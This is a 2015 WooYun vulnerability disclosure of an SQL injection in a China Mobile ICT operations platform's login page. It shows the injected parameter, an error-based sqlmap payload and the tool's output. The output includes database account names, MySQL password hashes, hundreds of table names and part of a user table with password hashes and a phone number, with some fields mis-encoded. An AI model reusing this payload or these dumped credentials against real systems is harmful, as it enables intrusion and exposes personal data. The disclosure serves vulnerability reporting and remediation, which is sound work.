当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153982

漏洞标题:中国移动某子站ICT运营管理平台存在SQL注入漏洞

相关厂商:中国移动

漏洞作者: 路人甲

提交时间:2015-11-23 18:52

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

飞度信息公司(**.**.**.**)为安徽移动开发的ICT运营管理平台访问首页存在SQL注入漏洞,由于该页面存在错误回显且对输入字符未做过滤,当注入SQL代码显示的错误内容中包含了重要信息的表名,进一步使用SQLMAP可以发现全面的数据库信息,没有深入挖掘数据库是否包含了涉及客户信息或者其他安全敏感信息。
由于该网站地址是公网地址,且从数据库暴露程度来看,个人认为安全风险比较高。
在分析一个移动内部的安卓应用程序时发现了一个叫做ICT运营管理平台的首页地址:**.**.**.**/login/ict/login.jsp,这很显然是个公网地址。
查看网页源代码可了解实际地址:**.**.**.**/login/loginAction.do?method=login
继续根据源代码提供的信息构造地址:**.**.**.**/login/loginAction.do?method=login&optrid=test&password=123
没有这个系统的账号密码,所以这里参数值都是随便写的,从下图可以看到,访问这个地址后,界面提示了账号不存在,说明这个构造地址看上去是可以用。

20151117135719.jpg


现在尝试注入,分别对optrid和password的参数增加'or 1=1;-- ,发现password参数增加注入后,页面回显报错了,并且包含了几个重要的数据库表名、字段,看来已经发现了个很低级的SQL注入点。

20151117140824.jpg


后面为了方便就直接使用sqlmap注入了,不出意外的爆库了。

漏洞证明:

sqlmap identified the following injection point(s) with a total of 495 HTTP(s) requests:
---
Parameter: password (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: method=login&optrid=admin&password=123' AND (SELECT 5396 FROM(SELECT COUNT(*),CONCAT(0x7176717671,(SELECT (ELT(5396=5396,1))),0x716a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Arww'='Arww
---
web application technology: JSP
back-end DBMS: active fingerprint: MySQL >= 5.5.0
banner parsing fingerprint: MySQL 5.6.20, logging enabled
banner: '5.6.20-log'
--数据库管理账号信息
database management system users [8]:
[*] 'backup'@'%'
[*] 'backup'@'**.**.**.**'
[*] 'ict'@'%'
[*] 'ict@%'@'%'
[*] 'root'@'%'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'localhost'
--数据库信息
available databases [5]:
[*] ict
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
--数据库用户密码HASH
database management system users password hashes:
[*] backup [2]:
password hash: *0D048B355AFF23A2F0A6E759FD01E206A0EF1A61
password hash: *20EF6AADA0ECB24D5CB2DCD7D85DA8A5F4CDE847
[*] ict [1]:
password hash: *0D048B355AFF23A2F0A6E759FD01E206A0EF1A61
[*] ict@% [1]:
password hash: *0D048B355AFF23A2F0A6E759FD01E206A0EF1A61
[*] root [3]:
password hash: *0D048B355AFF23A2F0A6E759FD01E206A0EF1A61
password hash: *20EF6AADA0ECB24D5CB2DCD7D85DA8A5F4CDE847
password hash: *3AB21F9B712B00CFA3F45FBFC3E9B84AB9D6614B
--承载这个平台的数据库表信息(部分)
Database: ict
[652 tables]
+----------------------------------------------------+
| depthmonitoring_temp |
| gjtemp |
| gjtemp_copy |
| gjtest |
| mas_tab |
| organization |
| t_in_exworknmsg_api_10658508 |
| t_in_exworknmsg_api_his_201308 |
| t_in_exworknmsg_api_his_201309 |
| t_in_exworknmsg_api_his_201310 |
| t_in_exworknmsg_api_his_201311 |
| t_in_exworknmsg_api_his_201312 |
| t_in_exworknmsg_api_his_201401 |
| t_in_exworknmsg_api_his_201402 |
| tb_busirecord_201309 |
| tb_busirecord_201310 |
| tb_busirecord_201311 |
| tb_busirecord_201312 |
| tb_busirecord_201401 |
| tb_busirecord_201402 |
| tb_busirecord_201403 |
| tb_busirecord_201404 |
| tb_busirecord_201405 |
| tb_busirecord_201406 |
| tb_busirecord_201407 |
| tb_busirecord_201408 |
| tb_busirecord_201409 |
| tb_busirecord_201410 |
| tb_busirecord_201411 |
| tb_busirecord_201412 |
| tb_busirecord_201501 |
| tb_busirecord_201502 |
| tb_busirecord_201503 |
| tb_busirecord_201504 |
| tb_busirecord_201505 |
| tb_busirecord_201506 |
| tb_busirecord_201507 |
| tb_busirecord_201508 |
| tb_busirecord_201509 |
| tb_busirecord_201510 |
| tb_busirecord_201511 |
| tb_busirecord_201512 |
| tb_config |
| tb_dictionary |
| tb_health_indicators |
| tb_health_model |
| tb_ict_alarm_switch |
| tb_ict_analysis |
| tb_ict_analysis_lat |
| tb_ict_areadistribution_201309 |
| tb_ict_areadistribution_201310 |
| tb_ict_areadistribution_201311 |
| tb_ict_areadistribution_201312 |
| tb_ict_areadistribution_201401 |
| tb_ict_areadistribution_201402 |
| tb_ict_areadistribution_201403 |
| tb_ict_areadistribution_201405 |
| tb_ict_areadistribution_201406 |
| tb_ict_areadistribution_201407 |
| tb_ict_areadistribution_201409 |
| tb_ict_areadistribution_201410 |
| tb_ict_areadistribution_201411 |
| tb_ict_areadistribution_201412 |
| tb_ict_areadistribution_201501 |
| tb_ict_areadistribution_201502 |
| tb_ict_areadistribution_201503 |
| tb_ict_areadistribution_201504 |
| tb_ict_areadistribution_201505 |
| tb_ict_areadistribution_201506 |
| tb_ict_areadistribution_201507 |
| tb_ict_areadistribution_201508 |
| tb_ict_areadistribution_201509 |
| tb_ict_areadistribution_201510 |
| tb_ict_areadistribution_201511 |
| tb_ict_blackkeywordtca_log_201309 |
| tb_ict_blackkeywordtca_log_201310 |
| tb_ict_blackkeywordtca_log_201311 |
| tb_ict_blackkeywordtca_log_201312 |
| tb_ict_blackkeywordtca_log_201401 |
| tb_ict_blackkeywordtca_log_201402 |
| tb_ict_blackkeywordtca_log_201403 |
| tb_ict_blackkeywordtca_log_201404 |
| tb_ict_blackkeywordtca_log_201405 |
| tb_ict_blackkeywordtca_log_201406 |
| tb_ict_blackkeywordtca_log_201409 |
| tb_ict_blackkeywordtca_log_201410 |
| tb_ict_blackkeywordtca_log_201411 |
| tb_ict_blackkeywordtca_log_201412 |
| tb_ict_blackkeywordtca_log_201501 |
| tb_ict_blackkeywordtca_log_201502 |
| tb_ict_blackkeywordtca_log_201503 |
| tb_ict_blackkeywordtca_log_201504 |
| tb_ict_blackkeywordtca_log_201505 |
| tb_ict_blackkeywordtca_log_201506 |
| tb_ict_blackkeywordtca_log_201507 |
| tb_ict_blackkeywordtca_log_201508 |
| tb_ict_blackkeywordtca_log_201509 |
| tb_ict_blackkeywordtca_log_201510 |
| tb_ict_blackkeywordtca_log_201511 |
| tb_ict_bussinessreport_201309 |
| tb_ict_bussinessreport_201310 |
| tb_ict_bussinessreport_201311 |
| tb_ict_bussinessreport_201312 |
| tb_ict_bussinessreport_201401 |
| tb_ict_bussinessreport_201402 |
| tb_ict_bussinessreport_201403 |
| tb_ict_bussinessreport_201404 |
| tb_ict_bussinessreport_201405 |
| tb_ict_bussinessreport_201406 |
| tb_ict_bussinessreport_201407 |
| tb_ict_bussinessreport_201408 |
| tb_ict_bussinessreport_201409 |
| tb_ict_bussinessreport_201410 |
| tb_ict_bussinessreport_201411 |
| tb_ict_bussinessreport_201412 |
| tb_ict_bussinessreport_201501 |
| tb_ict_bussinessreport_201502 |
| tb_ict_bussinessreport_201503 |
| tb_ict_bussinessreport_201504 |
| tb_ict_bussinessreport_201505 |
| tb_ict_bussinessreport_201506 |
| tb_ict_bussinessreport_201507 |
| tb_ict_bussinessreport_201508 |
| tb_ict_bussinessreport_201509 |
| tb_ict_bussinessreport_201510 |
| tb_ict_bussinessreport_201511 |
| …… |
+----------------------------------------------------+
--抓个典型表吧,数据库账户信息表(部分)
Table: tb_user
[77 entries]
+-----------+----------+--------+----------+-----+---------+--------------------------------+-------------+---------+---------------------+---------------------+---------+---------------------+---------+----------+----------+-----------+----------+----------------------------------------------------------+----------+----------+-----------+---------------+---------------+
| optrid | userid | itilid | validate | sex | photo | email | svcnum | remark | optdate | effdate | address | expdate | orgcode | postcode | citycode | username | birthday | password | optrcode | usertype | userlevel | pwdcreatetime | isdutymanager |
+-----------+----------+--------+----------+-----+---------+--------------------------------+-------------+---------+---------------------+---------------------+---------+---------------------+---------+----------+----------+-----------+----------+----------------------------------------------------------+----------+----------+-----------+---------------+---------------+
| 34013100 | è‘??…? | NULL | 1 | M | <blank> | <blank> | <blank> | <blank> | 2013-08-14 19:32:05 | 2013-08-13 19:02:33 | é???±± | 2099-01-01 00:00:00 | Y1402 | <blank> | J | è‘??…? | <blank> | 772C5E4E00ACF2B4479CB1D4C5886C6058756D34A0FD05BCDCD33552 | <blank> | 03 | <blank> | NULL | 0 |
| Y00000SYS | 34000228 | NULL | 1 | M | NULL | <blank> | 13955119078 | . | 2014-07-23 08:59:53 | 2013-12-29 00:00:00 | ??‰??? | 2037-12-30 00:00:00 | Y02 | <blank> | Z | ?????? | <blank> | C726AAF9FB3B72162142B2DF9FF78636B53C69E485606020E1CD17F4 | NULL | 01 | NULL | NULL | <blank> |
| Y00000SYS | 34000411 | NULL | 1 | M | <blank> | <blank> | <blank> | 1 | 2015-07-07 10:16:36 | 2013-08-13 00:00:00 | ???è?¥ | 2099-01-01 00:00:00 | Y1102 | <blank> | A | ????????? | <blank> | 772C5E4E00ACF2B4479CB1D4C5886C6058756D34A0FD05BCDCD33552 | <blank> | 03 | <blank> | NULL | 0 |
| 34000412 | 34000412 | NULL | 1 | M | <blank> | <blank> | <blank> | <blank> | 2013-10-15 14:49:10 | 2013-10-15 14:49:10 | ???è?¥ | 2099-01-01 00:00:00 | Y1101 | <blank> | A | ?–?è?a | <blank> | 772C5E4E00ACF2B4479CB1D4C5886C6058756D34A0FD05BCDCD33552 | <blank> | 03 | <blank> | NULL | 0 |
| 34000413 | 34000413 | NULL | 1 | M | <blank> | <blank> | <blank> | <blank> | 2013-08-14 19:32:05 | 2013-08-13 19:02:33 | ???è?¥ | 2099-01-01 00:00:00 | Y1101 | <blank> | A | ?€a??? | <blank> | 772C5E4E00ACF2B4479CB1D4C5886C6058756D34A0FD05BCDCD33552 | <blank> | 03 | <blank> | NULL | 0 |
| 34000414 | 34000414 | NULL | 1 | M | <blank> | <blank> | <blank> | <blank> | 2013-08-14 19:32:05 | 2013-08-13 19:02:33 | ???è?¥ | 2099-01-01 00:00:00 | Y1101 | <blank> | A | ???é??é?? | <blank> | 772C5E4E00ACF2B4479CB1D4C5886C6058756D34A0FD05BCDCD33552 | <blank> | 03 | <blank> | NULL | 0 |
| 34000416 | 34000416 | NULL | 1 | M | <blank> | <blank> | <blank> | <blank> | 2013-08-14 19:32:05 | 2013-08-13 19:02:33 | ???è?¥ | 2099-01-01 00:00:00 | Y1101 | <blank> | A | èμμ??? | <blank> | 772C5E4E00ACF2B4479CB1D4C5886C6058756D34A0FD05BCDCD33552 | <blank> | 03 | <blank> | NULL | 0 |
| 34000417 | 34000417 | NULL | 1 | M | <blank> | <blank> | <blank> | <blank> | 2013-08-14 19:32:05 | 2013-08-13 19:02:33 | ???è?¥ | 2099-01-01 00:00:00 | Y1101 | <blank> | A | ?”??§€?o‘ | <blank> | 772C5E4E00ACF2B4479CB1D4C5886C6058756D34A0FD05BCDCD33552 | <blank> | 03 | <blank> | NULL | 0 |
| Y00000SYS | 34000228 | NULL | 1 | M | NULL | <blank> | 13955119078 | . | 2014-07-23 08:59:53 | 2013-12-29 00:00:00 | ??‰??? | 2037-12-30 00:00:00 | Y02 | <blank> | Z | ?????? | <blank> | C726AAF9FB3B72162142B2DF9FF78636B53C69E485606020E1CD17F4 | NULL | 01 | NULL | NULL | <blank> |
| Y00000SYS | 34000228 | NULL | 1 | M | NULL | <blank> | 13955119078 | . | 2014-07-23 08:59:53 | 2013-12-29 00:00:00 | ??‰??? | 2037-12-30 00:00:00 | Y02 | <blank> | Z | ?????? | <blank> | C726AAF9FB3B72162142B2DF9FF78636B53C69E485606020E1CD17F4 | NULL | 01 | NULL | NULL | <blank> |
| Y00000SYS | 34000228 | NULL | 1 | M | NULL | <blank> | 13955119078 | . | 2014-07-23 08:59:53 | 2013-12-29 00:00:00 | ??‰??? | 2037-12-30 00:00:00 | Y02 | <blank> | Z | ?????? | <blank> | C726AAF9FB3B72162142B2DF9FF78636B53C69E485606020E1CD17F4 | NULL | 01 | NULL | NULL | <blank> |
| Y00000SYS | 34000228 | NULL | 1 | M | NULL | <blank> | 13955119078 | . | 2014-07-23 08:59:53 | 2013-12-29 00:00:00 | ??‰??? | 2037-12-30 00:00:00 | Y02 | <blank> | Z | ?????? | <blank> | C726AAF9FB3B72162142B2DF9FF78636B53C69E485606020E1CD17F4 | NULL | 01 | NULL | NULL | <blank> |
| Y00000SYS | 34000228 | NULL | 1 | M | NULL | <blank> | 13955119078 | . | 2014-07-23 08:59:53 | 2013-12-29 00:00:00 | ??‰??? | 2037-12-30 00:00:00 | Y02 | <blank> | Z | ?????? | <blank> | C726AAF9FB3B72162142B2DF9FF78636B53C69E485606020E1CD17F4 | NULL | 01 | NULL | NULL | <blank> |
| Y00000SYS | 34000228 | NULL | 1 | M | NULL | <blank> | 13955119078 | . | 2014-07-23 08:59:53 | 2013-12-29 00:00:00 | ??‰??? | 2037-12-30 00:00:00 | Y02 | <blank> | Z | ?????? | <blank> | C726AAF9FB3B72162142B2DF9FF78636B53C69E485606020E1CD17F4 | NULL | 01 | NULL | NULL | <blank> |
| Y00000SYS | 34000228 | NULL | 1 | M | NULL | <blank> | 13955119078 | . | 2014-07-23 08:59:53 | 2013-12-29 00:00:00 | ??‰??? | 2037-12-30 00:00:00 | Y02 | <blank> | Z | ?????? | <blank> | C726AAF9FB3B72162142B2DF9FF78636B53C69E485606020E1CD17F4 | NULL | 01 | NULL | NULL | <blank> |
| Y00000SYS | 34000228 | NULL | 1 | M | NULL | <blank> | 13955119078 | . | 2014-07-23 08:59:53 | 2013-12-29 00:00:00 | ??‰??? | 2037-12-30 00:00:00 | Y02 | <blank> | Z | ?????? | <blank> | C726AAF9FB3B72162142B2DF9FF78636B53C69E485606020E1CD17F4 | NULL | 01 | NULL | NULL | <blank> |
| Y00000SYS | 34000228 | NULL | 1 | M | NULL | <blank> | 13955119078 | . | 2014-07-23 08:59:53 | 2013-12-29 00:00:00 | ??‰??? | 2037-12-30 00:00:00 | Y02 | <blank> | Z | ?????? | <blank> | C726AAF9FB3B72162142B2DF9FF78636B53C69E485606020E1CD17F4 | NULL | 01 | NULL | NULL | <blank> |
| Y00000SYS | 34000228 | NULL | 1 | M | NULL | <blank> | 13955119078 | . | 2014-07-23 08:59:53 | 2013-12-29 00:00:00 | ??‰??? | 2037-12-30 00:00:00 | Y02 | <blank> | Z | ?????? | <blank> | C726AAF9FB3B72162142B2DF9FF78636B53C69E485606020E1CD17F4 | NULL | 01 | NULL | NULL | <blank> |
| 34000419 | 34000419 | NULL | 1 | M | <blank> | <blank> | <blank> | <blank> | 2013-08-14 19:32:05 | 2013-08-13 19:02:33 | ???è?¥ | 2099-01-01 00:00:00 | Y1101 | <blank> | A | ?????§è?3 | <blank> | 772C5E4E00ACF2B4479CB1D4C5886C6058756D34A0FD05BCDCD33552 | <blank> | 03 | <blank> | NULL | 0 |

修复方案:

屏蔽回显,过滤字符。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-27 13:41

厂商回复:

CNVD未复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无